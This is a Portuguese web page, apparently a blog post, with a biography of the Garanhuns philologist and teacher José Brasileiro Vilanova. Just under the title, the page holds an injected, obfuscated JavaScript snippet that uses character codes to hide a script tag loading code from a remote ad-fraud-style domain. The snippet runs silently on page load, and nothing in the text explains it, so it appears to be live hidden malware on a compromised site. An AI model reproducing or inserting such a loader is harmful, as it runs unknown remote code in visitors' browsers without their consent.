Materiam Superabat Opus

Caminhos de José Brasileiro Vilanova

Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

O patrono da Cadeira 21 da Academia de Letras de Garanhuns, escritor e filólogo José Brasileiro Vilanova, nasceu nesta cidade, em 1914, portanto em plena eclosão da Primeira Guerra Mundial. Aos quatro aninhos, portanto em 1917, viu e ouviu o vaivém e disse-me-disse da Hecatombe de Garanhuns, cujo pivô da tragédia foi um dos seus familiares, o coronel e político Júlio Brasileiro, assassinado quando se encontrava no centro da capital pernambucana.

 

Nessa época, era frequente o desejo das famílias tradicionais de terem pelo menos um filho seguindo a carreira sacerdotal. Foi assim com o jovem José Brasileiro Vilanova, matriculado pelos pais no Seminário Menor São José de Garanhuns, de onde partiu diretamente para o Seminário Arquiepiscopal de Olinda.

Mas estava escrito nas estrelas que o seu caminho não seria o sacerdotal, eis que, após concluir Teologia, no Seminário de Olinda, ingressa em seguida nas Faculdades de Letras Neolatinas e de Filosofia, para depois graduar-se pela Faculdade de Direito do Recife, onde realizou também o doutorado, defendendo a tese sob o título “Da Responsabilidade Penal do Médico”, aprovado com louvor pela Banca Examinadora, 1956.

Conquista, em seguida, através de concursos públicos de provas e títulos, as cátedras de Língua Portuguesa, Latim e Didática Especial de Língua Portuguesa da Faculdade de Filosofia de Pernambuco, Colégio Estadual e para os cursos de graduação e pós-graduação em Letras da Universidade Federal de Pernambuco. Foi professor do curso superior de Jornalismo da Universidade Católica de Pernambuco, início dos anos sessenta.

Ministrou também essas disciplinas nos principais colégios da rede privada, como do Recife, como Salesiano, Porto Carreiro, Oswaldo Cruz, Ginásio Mauá, Vera Cruz, Escola Técnica de Comércio da Faculdade de Ciências Econômicas do Recife, Instituto de Educação de Pernambuco, entre outras.

Perde a Igreja um sacerdote, mas ganha o Magistério um dos seus expoentes, autor de obras didáticas e paradidáticas adotadas pelas instituições de ensino médio e superior de todo o Brasil.

Compôs bancas examinadores de vestibulares e de concursos públicos para docentes das principais instituições superiores do Brasil. Convocado com frequência para ministrar cursos de extensão e especialização em língua Portuguesa.

Desempenhou as funções de secretário de Educação de Pernambuco, no período de 1966/7; e coordenou o projeto nacional da Norma Linguística Urbana Culta, a convite do Ministério da Educação do Brasil. É homenageado por instituições públicas e privadas, principalmente nas redes de ensino estadual e municipais.

Suas principais obras, de alcance didático e paradidático, com sucessivas edições pelas grandes editoras do Rio e São Paulo: “Contribuição ao Estudo da Antroponímia”; “Linguagem e Poesia”, 1959; “Cassimiro de Abreu (temática e linguagem poética)”, 1957; “Teresa Margarida – Moralista Portuguesa”, “Sentido Estético e Cultural do Modernismo”, edição 1957; “Programas de Português do Curso secundário 1ª, 2ª, 3ª e 4ª séries”, editora do Brasil, edição 1957; “A Literatura no Brasil Colonial”, editora da Universidade Federal de Pernambuco, 1977; “Aspectos Estilísticos da Língua Portuguesa”, considerada clássica, abrangendo a estilística fonética, léxica, morfológica e sintática, bem como a linguagem figurada.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.